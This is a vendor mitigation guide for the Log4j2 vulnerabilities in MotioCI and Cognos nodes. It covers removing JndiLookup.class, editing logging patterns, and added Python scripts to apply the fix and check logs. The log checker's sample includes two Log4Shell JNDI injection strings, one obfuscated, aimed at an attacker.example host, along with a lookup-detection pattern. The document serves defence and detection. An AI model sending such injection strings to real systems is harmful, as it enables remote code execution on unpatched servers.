MotioCI - Mitigation Procedure for Log4j2 Vulnerability (CVE-2021-45046, CVE-2021-45105, CVE-2021-44228)

Motio has released a new fix level, MotioCI 3.2.10 FL9. This version of MotioCI includes Log4j2 v2.17, which addresses all three CVEs (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105). MotioCI 3.2.10 FL8 only protects against CVE-2021-44228 and CVE-2021-45046, while MotioCI 3.2.10 FL7 only protects against CVE-2021-44228. We recommend that all customers who are able to do so update to the new release to eliminate these CVEs. Where an upgrade is not possible at this time, the mitigation procedure below removes the JNDI lookup path that CVE-2021-44228 and CVE-2021-45046 exploit from an existing installation.

Several mitigation steps can be taken to immediately close off this vulnerability in existing MotioCI installations (details below). They consist of:

  1. Locate the log4j-core-2.9.0.jar file under the MotioCI installation and remove org/apache/logging/log4j/core/lookup/JndiLookup.class from the jar (using WinZip or similar).

  2. Edit the Main Process and Worker Process log4j2.xml configuration files to disable message lookups.

  3. Remove JndiLookup.class from the log4j-core jar on each Cognos dispatcher and Content Manager node that has the Active Versioning plugin installed, then stop and start the Cognos services.

If you have any questions or would like assistance please open a support ticket or send an email to help@motio.com and our support team will be happy to assist.

The locations of the three files involved vary by MotioCI version.

MotioCI 3.2.9 and Earlier

  File                            Location (relative to MotioCI installation directory)
  Log4j2 core jar                 tomcat\webapps\ROOT\WEB-INF\lib\log4j-core-2.9.0.jar
  Main Process logging config     tomcat\webapps\ROOT\WEB-INF\classes\log4j2.xml
  Worker Process logging config   workers\configuration\log4j2.xml


MotioCI 3.2.10 (FL1 through FL6)

  File                            Location (relative to MotioCI installation directory)
  Log4j2 core jar                 motioci\WEB-INF\lib\log4j-core-2.9.0.jar
  Main Process log4j2.xml         motioci\WEB-INF\classes\log4j2.xml
  Worker Process log4j2.xml       workers\configuration\log4j2.xml


Step 1 - Remove the Vulnerable Class from log4j-core-2.9.0.jar

  1. Stop the MotioCI service.

  2. Find log4j-core-2.9.0.jar under your MotioCI root directory (see the tables above for the exact location) and keep a backup copy of it before editing.

  3. Remove the org\apache\logging\log4j\core\lookup\JndiLookup.class file from this jar.

    On Windows:

      1. Open the jar file in your favorite zip utility (e.g. WinZip or 7-Zip).

      2. In the zip utility, navigate to org\apache\logging\log4j\core\lookup.

      3. Select JndiLookup.class.

      4. Delete this file from the archive.

    On Linux or Unix, use a command-line tool such as zip or jar to remove the file from the jar. For example:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Removing this class is the mitigation Apache recommends for Log4j 2.x versions that cannot be upgraded. The log4j2.formatMsgNoLookups property is not an alternative here: it was only introduced in Log4j 2.10, so the 2.9.0 jar shipped with these MotioCI versions ignores it. After editing, list the jar's contents again and confirm that JndiLookup.class is gone before moving on.


Step 2 - Adjust the Logging Configuration Files to Disable Message Lookup

In this step, we edit the message pattern in the Main Process and Worker Process log4j2.xml files to explicitly disable message lookups. This is done by changing %m in the logging pattern to %m{nolookups}.

This step is defence in depth on top of Step 1, not a replacement for it. Apache's Log4j security advisory lists %m{nolookups} (and the formatMsgNoLookups setting) as insufficient on its own against CVE-2021-45046, because a layout that uses a Context Lookup (${ctx:...}) in its pattern can still reach lookups through Thread Context Map values. Removing JndiLookup.class in Step 1 is what closes the JNDI path; Step 2 additionally adds a semicolon marker that lets you confirm from the logs that the edited configuration is the one in effect. Neither step addresses CVE-2021-45105 (a recursion denial of service reachable only through a Context Lookup in a layout pattern); only the upgrade to FL9 with Log4j 2.17 removes that one.

Using a text editor of your choice, apply the following changes to BOTH the Main Process and Worker Process log4j2.xml files (two files need to be edited). Consult the tables above for the locations of these files.

For each log4j2.xml file:

  1. Open the file in a text editor.

  2. Locate the two lines for modification:

<PatternLayout pattern="[%X{workerPid}] [%t][%c{1}]: %m%n"/>

<PatternLayout pattern="%d %-5p [%t][%X{txId}] [%c{1}]: %m%n"/>

  3. Change these two lines to the following. Note that the colon after the logger name has also been changed to a semicolon, so that the logs carry a visual indicator that the change has been applied:

<PatternLayout pattern="[%X{workerPid}] [%t][%c{1}]; %m{nolookups}%n"/>

<PatternLayout pattern="%d %-5p [%t][%X{txId}] [%c{1}]; %m{nolookups}%n"/>

  4. Save the modified file.

Once both files have been saved, restart the MotioCI service.


Step 3 - Remove the JndiLookup.class from each Cognos node with MotioCI Active Versioning plugin installed

The vulnerable version of log4j (log4j-core-2.9.0.jar) is also part of the MotioCI Active Versioning installation. If Active Versioning is in use, the plug-in is installed on every Content Manager and dispatcher node in the Cognos environment, so the same mitigation must be applied on each of those nodes.

To mitigate, remove the vulnerable class from log4j-core-2.9.0.jar on each Cognos node with the MotioCI Active Versioning plug-in installed:
  1. Find log4j-core-2.9.0.jar on each Cognos dispatcher and Content Manager node:
     <Cognos root>/webapps/MotioCI-agent/WEB-INF/lib/log4j-core-2.9.0.jar
  2. Remove JndiLookup.class from the jar using the same steps as in Step 1.
  3. Stop and start the Cognos service.

[Screenshot: JndiLookup.class inside log4j-core-2.9.0.jar on a Cognos node]
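Steps 1 to 3 as one script, added here as an example; it is not Motio's own tooling. It uses only the Python standard library, so it runs the same way on Windows (no WinZip or 7-Zip needed) and on Linux. It assumes the file locations from the tables above (the MotioCI 3.2.10 FL1 through FL6 layout by default) and the two PatternLayout lines quoted in Step 2; INSTALL_ROOT and COGNOS_ROOTS at the bottom are placeholders you must point at the real directories. Stop the MotioCI and Cognos services before running it.

```python
"""Apply the MotioCI Log4j2 mitigation (Steps 1-3) with the Python standard library.

Added example, not Motio's tooling. Paths follow the tables in the article;
INSTALL_ROOT / COGNOS_ROOTS are placeholders (assumption)."""
import os
import re
import shutil
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Relative locations from the tables above (MotioCI 3.2.10 FL1-FL6). For
# 3.2.9 and earlier, the first three live under tomcat/webapps/ROOT/WEB-INF/.
JAR_REL = "motioci/WEB-INF/lib/log4j-core-2.9.0.jar"
CONFIG_REL = ("motioci/WEB-INF/classes/log4j2.xml", "workers/configuration/log4j2.xml")
AGENT_JAR_REL = "webapps/MotioCI-agent/WEB-INF/lib/log4j-core-2.9.0.jar"  # per Cognos node

# The two layouts quoted in Step 2 end in "[%c{1}]: %m%n"; the rewrite turns that
# into "[%c{1}]; %m{nolookups}%n" (lookups off, plus the ';' marker for the logs).
PATTERN_RE = re.compile(r"(\[%c\{1\}\]): %m%n")


def jar_has_jndi_lookup(jar: Path) -> bool:
    """Check for the vulnerable class; run it after editing to confirm removal."""
    with zipfile.ZipFile(jar) as zf:
        return JNDI_CLASS in zf.namelist()


def strip_jndi_lookup(jar: Path) -> bool:
    """Steps 1 and 3: rewrite the jar without JndiLookup.class.

    Returns True if the class was present and removed, False if the jar was
    already clean. The original jar is kept next to it as <name>.bak."""
    with zipfile.ZipFile(jar) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        tmp = jar.with_name(jar.name + ".tmp")
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename == JNDI_CLASS:
                    continue
                # Copy every other entry with its original metadata (compression
                # method, timestamp) so the jar is otherwise unchanged.
                dst.writestr(info, src.read(info.filename))
    shutil.copy2(jar, jar.with_name(jar.name + ".bak"))
    os.replace(tmp, jar)  # swap in the clean jar once both archives are closed
    return True


def disable_message_lookups(xml_text: str) -> tuple:
    """Step 2 on a string: returns (new_text, number_of_patterns_changed).

    Running it on an already edited file changes nothing (count 0)."""
    return PATTERN_RE.subn(r"\1; %m{nolookups}%n", xml_text)


def patch_config(path: Path) -> int:
    """Step 2 on a file; keeps a .bak copy when something was changed."""
    new_text, count = disable_message_lookups(path.read_text(encoding="utf-8"))
    if count:
        shutil.copy2(path, path.with_name(path.name + ".bak"))
        path.write_text(new_text, encoding="utf-8")
    return count


def mitigate(install_root: Path, cognos_roots) -> dict:
    """Run all three steps and return a per-file report (missing files are reported, not fatal)."""
    report = {}
    jars = [install_root / JAR_REL] + [Path(r) / AGENT_JAR_REL for r in cognos_roots]
    for jar in jars:
        if not jar.exists():
            report[str(jar)] = "missing"
            continue
        report[str(jar)] = "JndiLookup.class removed" if strip_jndi_lookup(jar) else "already clean"
        if jar_has_jndi_lookup(jar):  # post-condition: never trust the edit without re-reading the jar
            raise RuntimeError(f"{jar} still contains {JNDI_CLASS}")
    for rel in CONFIG_REL:
        cfg = install_root / rel
        report[str(cfg)] = "missing" if not cfg.exists() else f"{patch_config(cfg)} pattern(s) changed"
    return report


if __name__ == "__main__":
    # Placeholders (assumption): point these at the real MotioCI and Cognos roots.
    INSTALL_ROOT = Path(r"C:\MotioCI")
    COGNOS_ROOTS = [Path(r"C:\Program Files\ibm\cognos\analytics")]
    for target, outcome in mitigate(INSTALL_ROOT, COGNOS_ROOTS).items():
        print(f"{target}: {outcome}")
```

The script is idempotent: a second run reports "already clean" and "0 pattern(s) changed", which is also how you can audit a node someone else has mitigated by hand. On a Cognos node without a MotioCI installation, pass the Cognos root only and ignore the "missing" entries for the MotioCI-side files.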


Verifying that the Mitigation Has Been Successfully Applied

After MotioCI has restarted, download the log files from within MotioCI. Each log message written since the restart should now have a semicolon directly after the logger class name; messages written before the restart still show the colon. For example, in the sample log messages below, there is a semicolon after [StartupListener].


2021-12-12 10:42:23,886 INFO  [main] [] [StartupListener]; StartupService [com.focus.rclci.startup.LoadDatabasePropertiesStartupService] took [00:00:04.353] to complete successfully.

2021-12-12 10:42:23,887 INFO  [main] [] [StartupListener]; Executing StartupService  [com.focus.rclci.startup.MaintenanceStartupService]
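A small checker for the downloaded logs, added here as an example and not part of Motio's tooling. It parses Main Process lines in the layout from Step 2 (Worker Process lines use a different layout and are counted as unparsed), counts lines with and without the semicolon marker, and flags messages that still contain Log4j lookup syntax: once JndiLookup.class is gone and %m{nolookups} is in place, such a string is logged verbatim instead of being evaluated, so its presence is a cheap indicator of an exploitation attempt against the instance. The lines in SAMPLE_LOG are constructed for the example: the two StartupListener lines with the semicolon mirror the samples above; the pre-restart line and the LoginController lines with the attacker.example host are made up.

```python
"""Check MotioCI Main Process log lines after the Log4j2 mitigation.

Added example, not Motio's tooling. SAMPLE_LOG is constructed for the example."""
import re

# Main Process layout after Step 2: "%d %-5p [%t][%X{txId}] [%c{1}]; %m{nolookups}%n".
# The unpatched layout emits ':' instead of ';' after the logger name, so the
# separator tells whether the line was written by the edited configuration.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d,\d{3}) (?P<level>[A-Z]+)\s+"
    r"\[(?P<thread>[^\]]*)\] \[(?P<txid>[^\]]*)\] \[(?P<logger>[^\]]+)\]"
    r"(?P<sep>[:;]) (?P<msg>.*)$"
)

# Log4j2 lookup syntax surviving in a message. The lazy "[^}]*?" also catches
# nested obfuscation such as ${${lower:j}ndi:...} because it stops at the
# first recognised lookup prefix rather than at the first closing brace.
LOOKUP_RE = re.compile(
    r"\$\{[^}]*?(?:jndi|lower|upper|env|sys|ctx|date|main|java):", re.IGNORECASE
)

# Constructed sample: line 1 is a pre-restart line (colon), lines 2-3 mirror the
# article's samples, lines 4-5 are made-up login failures carrying lookup strings.
SAMPLE_LOG = """\
2021-12-12 10:41:58,102 INFO  [main] [] [StartupListener]: Executing StartupService  [com.focus.rclci.startup.LoadDatabasePropertiesStartupService]
2021-12-12 10:42:23,886 INFO  [main] [] [StartupListener]; StartupService [com.focus.rclci.startup.LoadDatabasePropertiesStartupService] took [00:00:04.353] to complete successfully.
2021-12-12 10:42:23,887 INFO  [main] [] [StartupListener]; Executing StartupService  [com.focus.rclci.startup.MaintenanceStartupService]
2021-12-12 11:03:07,412 WARN  [http-nio-8080-exec-3] [tx-91] [LoginController]; Login failed for user ${jndi:ldap://attacker.example/a}
2021-12-12 11:03:09,001 WARN  [http-nio-8080-exec-4] [tx-92] [LoginController]; Login failed for user ${${lower:j}ndi:ldap://attacker.example/b}
"""


def check_log(text: str) -> dict:
    """Classify each line as patched (';'), unpatched (':') or unparsed, and
    collect (timestamp, logger, message) for lines whose message still carries
    lookup syntax."""
    result = {"patched": 0, "unpatched": 0, "unparsed": 0, "lookup_attempts": []}
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            result["unparsed"] += 1
            continue
        result["patched" if m.group("sep") == ";" else "unpatched"] += 1
        if LOOKUP_RE.search(m.group("msg")):
            result["lookup_attempts"].append((m.group("ts"), m.group("logger"), m.group("msg")))
    return result


def mitigation_in_effect(text: str) -> bool:
    """True when every parsed line carries the ';' marker, i.e. the edited
    configuration produced all of them. Feed it only lines written after the
    restart; pre-restart lines still carry the colon and make this False."""
    r = check_log(text)
    return r["patched"] > 0 and r["unpatched"] == 0


if __name__ == "__main__":
    summary = check_log(SAMPLE_LOG)
    print({k: v for k, v in summary.items() if k != "lookup_attempts"})
    for ts, logger, msg in summary["lookup_attempts"]:
        print(f"lookup string logged verbatim at {ts} by [{logger}]: {msg}")
    print("all parsed lines from edited config:", mitigation_in_effect(SAMPLE_LOG))
```

Run it against the downloaded Main Process log after trimming everything before the restart; any remaining "unpatched" count means a log4j2.xml was missed or the service picked up an old copy, and any "lookup_attempts" entries are worth a look at the source addresses even though the lookup was not evaluated.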